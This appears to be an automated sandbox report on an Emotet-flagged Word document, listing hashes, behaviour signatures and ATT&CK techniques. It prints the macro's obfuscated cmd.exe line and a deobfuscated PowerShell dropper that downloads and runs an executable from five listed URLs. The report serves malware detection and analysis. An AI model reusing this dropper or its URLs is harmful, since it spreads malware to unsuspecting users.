Overview

overview

10

Static

static

8

emotet_v6

windows10_x64

10

emotet_doc

windows10_x64

10

Analysis

  • max time kernel
    125s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    04-12-2021 02:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc

  • Size

    94KB

  • MD5

    ecf475aea6d373c61244f4db7d2ee595

  • SHA1

    8f20b0a73d536e74c3c55d1fa98d07ab98ef46b6

  • SHA256

    fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee

  • SHA512

    e2e9852a1de72e3e8d569842899c07f0be1d0305c75ac4bfa171ffda6d7d19298da492be2b11174ffe7ab29f379a592f68e30078dffadfdf414c94433bfac087

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://cotton-world.net/as03M
exe.dropper

http://mandram.com/2MouUZ
exe.dropper

http://djteresa.net/RTKYqE
exe.dropper

http://vkontekste.net/db20
exe.dropper

http://art-nail.net/Y

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd /V/C"s^e^t 7^j=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^};^kaerb;ldd$ m^e^t^I-^ekovnI^;)ldd$ ,^awS^$(e^l^i^F^da^o^lnw^o^D^.^a^T^z^${^yrt{)^jlw^$^ ni ^aw^S$(^hc^aerof;'exe^.^'^+hNF$^+^'\'+ci^l^b^up^:vne$^=l^dd$^;^'^0^1^6' = hN^F$;)'@'(^ti^lp^S.'Y/ten^.^li^an-^tra//:^ptth@^02b^d/t^en^.et^sk^etn^o^kv//:pt^t^h^@E^q^Y^KTR/t^en^.^a^s^eretj^d//:p^tth^@^Z^Uu^oM^2/^m^oc.mar^dnam//^:^p^tth@^M30^s^a/^t^en^.^dlr^o^w^-no^t^toc//^:p^t^t^h^'^=^j^lw$;^tnei^lCbe^W^.^t^eN tcejb^o^-w^en^=^a^T^z^$ ll^e^hsr^e^wop&&^f^or /^L %^b in (3^41^,-^1^,^0)d^o ^s^et K^W^a=!K^W^a!!7^j:~%^b,1!&&i^f %^b ^l^eq ^0 ca^l^l %K^W^a:^*^KW^a!^=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $zTa=new-object Net.WebClient;$wlj='http://cotton-world.net/as03M@http://mandram.com/2MouUZ@http://djteresa.net/RTKYqE@http://vkontekste.net/db20@http://art-nail.net/Y'.Split('@');$FNh = '610';$ddl=$env:public+'\'+$FNh+'.exe';foreach($Swa in $wlj){try{$zTa.DownloadFile($Swa, $ddl);Invoke-Item $ddl;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/844-256-0x0000000000000000-mapping.dmp
    Download
  • memory/844-288-0x00000261DF556000-0x00000261DF558000-memory.dmp
    Filesize

    8KB

    Download
  • memory/844-267-0x00000261DF553000-0x00000261DF555000-memory.dmp
    Filesize

    8KB

    Download
  • memory/844-266-0x00000261DF550000-0x00000261DF552000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2432-119-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2432-121-0x000002A7964E0000-0x000002A7964E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2432-122-0x000002A7964E0000-0x000002A7964E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2432-123-0x000002A7964E0000-0x000002A7964E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2432-120-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2432-116-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2432-118-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2432-117-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3704-254-0x0000000000000000-mapping.dmp
    Download